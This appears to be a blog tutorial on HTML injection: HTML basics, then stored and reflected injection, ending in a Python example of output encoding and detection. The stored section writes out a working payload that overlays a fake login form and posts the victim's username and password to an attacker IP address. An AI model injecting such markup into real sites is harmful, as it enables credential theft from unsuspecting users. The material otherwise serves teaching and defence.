HTML INJECTION


HTML (Hyper Text Markup Language) is the standard markup language used for designing Web pages.
→ HTML describes the structure of Web pages using markup
→ HTML elements are the building blocks of HTML pages
→ HTML elements are represented by tags
→ HTML tags label pieces of content such as “heading”, “paragraph”, “table” and so on.
→ Browsers do not show the HTML tags, but use them to decide how to render the content of the page

                         {Please look image 01}

HTML Tags:

HTML tags are element names surrounded by angle brackets. Tags come in two kinds: an opening tag and a closing tag.

HTML Elements:
An HTML element usually consists of a start tag and end tag, with the content inserted in between.

HTML Attributes:
Attributes provide additional information about HTML elements. Attributes generally come in the form of name/value pairs like: name="value"

Create Web page using HTML
Generally “Notepad” (or any text editor) is used to write the HTML code; save the text file with a .html/.htm extension, then open the saved file in any web browser.

Example: Web page
<!DOCTYPE html>
<html>
<head>
<title>HTML Injection</title>
</head>
<body bgcolor="pink">
<br>
<center><h2>Welcome for the example web page</h2>
<br>
<p>Responsible: Infosec.intellegence.blog.in</p>
</center>
</body>
</html>


→ The <!DOCTYPE html> declaration defines this document to be HTML5
→ The <html> element is the root element of an HTML page
→ The <head> element contains meta information about the document
→ The <title> element specifies a title for the document
→ The <body> element contains the visible page content; here its bgcolor attribute is set to "pink"
→ The <br> element defines a line break
→ The <h1> to <h6> elements define headings, <h1> being the largest; the example above uses <h2>
→ The <p> element defines a paragraph

HTML Version:
→ HTML - 1991
→ HTML 2.0 - 1995
→ HTML 3.2 - 1997
→ HTML 4.01 - 1999
→ XHTML - 2000
→ HTML5 - 2014

HTML Injection:
HTML injection is a vulnerability in a website that occurs when user input is not correctly sanitized or the output is not encoded, so that an attacker is able to inject valid HTML code into a vulnerable web page. There are many techniques that use elements and attributes to inject HTML content.
If the injected strings are not correctly sanitized, the same flaw can escalate to XSS-based HTML injection.

There are two types of HTML injection as follows,
→ Stored HTML
→ Reflected HTML

Stored HTML:
Stored HTML injection is also known as persistent injection, because the injected malicious code is stored permanently on the web server and the application serves it back to every user who visits the affected page. When a client interacts with the payload, which appears to be an official part of the website, the injected HTML code is rendered by the browser.

                         {Please look image 02}

Enter the following HTML code inside the given text field to perform the HTML injection attack.

<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://172.20.10.3 /login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>

The above HTML code creates a fake user login page on the targeted web page and forwards the entered credentials to the attacker’s IP address.

                         {Please look image 03}

                         {Please look image 04}

The attacker is able to receive the username and password entered by the client. Since the payload is stored permanently, the attacker can collect any number of usernames and passwords from legitimate clients.

Reflected HTML:
Reflected HTML injection is also known as non-persistent injection. It occurs when the web application responds immediately to the user’s input without validating it, which lets an attacker inject browser-executable code into a single HTML response. It is called “non-persistent” because the malicious content is not stored on the web server; the attacker therefore has to deliver the malicious link to the victim, typically through phishing.

                         {Please look image 07}

For example, submit the input username=<h1><a href="http://google.com">Mohanraja</a></h1> and password=<h2>blogspot.com</h2>

                         {Please look image 06}
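To make the root cause behind both the stored and the reflected case concrete, here is an added Python example (not from the original post) that renders the reflected username from the example above once without output encoding and once with html.escape, together with a simple response-side check a tester can use to confirm the fix; the page template, the function names and the set of expected tags are assumptions.

```python
import html
import re

# Constructed sample input: the reflected value shown in the post, plus a harmless one.
HARMLESS = "Mohanraja"
INJECTED = '<h1><a href="http://google.com">Mohanraja</a></h1>'

# The only tag the (assumed) welcome template is supposed to emit.
EXPECTED_TAGS = {"p"}

TAG_RE = re.compile(r"</?\s*([a-zA-Z][a-zA-Z0-9]*)[^>]*>")


def render_unsafe(username):
    """Vulnerable: the raw value is concatenated into the response body,
    so tags supplied by the user become live markup in the victim's browser."""
    return "<p>Welcome, " + username + "</p>"


def render_safe(username):
    """Hardened: HTML-encode the value for element content.
    '<' becomes '&lt;', so the browser shows the tags as plain text."""
    return "<p>Welcome, " + html.escape(username, quote=True) + "</p>"


def render_safe_attr(username):
    """Hardened for attribute context: quote=True also encodes the double quote,
    so the value cannot close the attribute it is placed in."""
    return '<input type="text" name="username" value="' + html.escape(username, quote=True) + '">'


def tag_names(markup):
    """Return the set of tag names present in a fragment of HTML."""
    return {m.group(1).lower() for m in TAG_RE.finditer(markup)}


def unexpected_tags(rendered, expected=EXPECTED_TAGS):
    """Detection check: any tag in the response that the template never emits
    means user-controlled markup reached the page unencoded."""
    return tag_names(rendered) - expected


def contains_markup(value):
    """Input-side indicator for logging: does the submitted value carry HTML tags?
    Useful for alerting, but not a substitute for output encoding."""
    return bool(TAG_RE.search(value))


if __name__ == "__main__":
    for name, fn in (("unsafe", render_unsafe), ("safe", render_safe)):
        out = fn(INJECTED)
        print(name, "->", out)
        print("  unexpected tags:", unexpected_tags(out) or "none")
```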